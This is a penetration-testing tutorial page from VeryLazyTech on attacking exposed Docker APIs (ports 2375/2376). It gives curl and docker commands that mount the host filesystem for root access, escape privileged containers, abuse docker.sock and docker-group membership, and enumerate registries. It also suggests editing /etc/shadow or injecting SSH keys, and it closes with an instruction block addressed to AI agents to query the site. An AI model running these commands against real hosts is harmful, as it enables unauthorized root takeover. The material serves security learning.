# Docker - Port 2375,2376

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic info

Docker is a widely used containerization platform that allows developers to package applications with their dependencies into isolated units. However, misconfigurations, exposed APIs, and poor access control practices can create serious security risks. This guide provides comprehensive techniques for **Docker penetration testing**, focusing on real-world attack vectors, privilege escalation, container escape, and host exploitation.

### Identifying Docker in a Target Environment

#### Detecting Docker Services via Network Scanning

Docker’s remote API may be exposed on:

* **Port 2375** (unencrypted)
* **Port 2376** (TLS-encrypted)

Scan using Nmap:

```bash
nmap -p 2375,2376 --script http-title,http-docker-registry <target-ip>
```

Check for Docker API access:

```bash
curl http://<target-ip>:2375/containers/json
```

If you receive JSON output, the Docker API is **unauthenticated and exposed**.

***

## Exploiting Exposed Docker API

### Listing Containers

```bash
curl http://<target-ip>:2375/containers/json
```

#### Running a New Container (Interactive Shell)

```bash
curl -X POST http://<target-ip>:2375/containers/create -H "Content-Type: application/json" \
-d '{"Image":"alpine", "Cmd":["/bin/sh"], "HostConfig": {"Binds":["/:/host"]}}'
```

Then start it:

```bash
curl -X POST http://<target-ip>:2375/containers/<container_id>/start
```

Access with:

```bash
curl -X POST -H "Content-Type: application/json" \
http://<target-ip>:2375/containers/<container_id>/exec \
-d '{"AttachStdout": true, "AttachStderr": true, "Tty": true, "Cmd": ["/bin/sh"]}'
```

This allows you to **escape to the host** by accessing `/host`.

***

## Docker Socket Abuse (`/var/run/docker.sock`)

When Docker is exposed via the Docker socket, it allows root-level control over the host.

Check access:

```bash
ls -la /var/run/docker.sock
```

#### Privilege Escalation via Docker Socket

If you have write access to `docker.sock`, you can create a container with the host mounted:

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt
```

This drops you into the **host filesystem as root**.

***

## Container Escape Techniques

### 1. Privileged Containers

Check if container runs with `--privileged`:

```bash
cat /proc/1/cgroup
```

If you see `docker` with no restrictions, and `cap_sys_admin`, then:

```bash
mount -t proc proc /host/proc
chroot /host /bin/bash
```

### 2. Mounting Host Filesystems

Containers running with `-v /:/mnt` allow direct access to the host’s root filesystem.

Escalate:

```bash
chroot /mnt
```

Then modify `/etc/shadow`, `/etc/sudoers`, or inject SSH keys.

***

## Detecting Docker Environment From Inside a Container

Check for containerized environment:

```bash
cat /proc/1/cgroup | grep -i docker
grep -q 'docker' /proc/self/cgroup && echo "Running in Docker"
```

Look for environment variables like:

```bash
env | grep -i docker
```

Presence of `/docker-entrypoint.sh`, `/var/run/docker.sock`, or `.dockerenv` are telltale signs.

***

## Attacking Misconfigured Docker Registries

#### Discovering Registries

```bash
nmap -p 5000 --script http-title,http-docker-registry <target>
```

Access registry:

```bash
curl http://<target>:5000/v2/_catalog
```

List tags:

```bash
curl http://<target>:5000/v2/<image>/tags/list
```

Pull vulnerable images:

```bash
docker pull <target>:5000/<image>:<tag>
```

Analyze locally for secrets or backdoors.

***

## Privilege Escalation via Docker Group Membership

If a user is in the `docker` group, they can effectively become **root**:

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt
```

Check:

```bash
groups
```

If `docker` is listed, the user has full control over the host.

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/docker-port-2375-2376.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.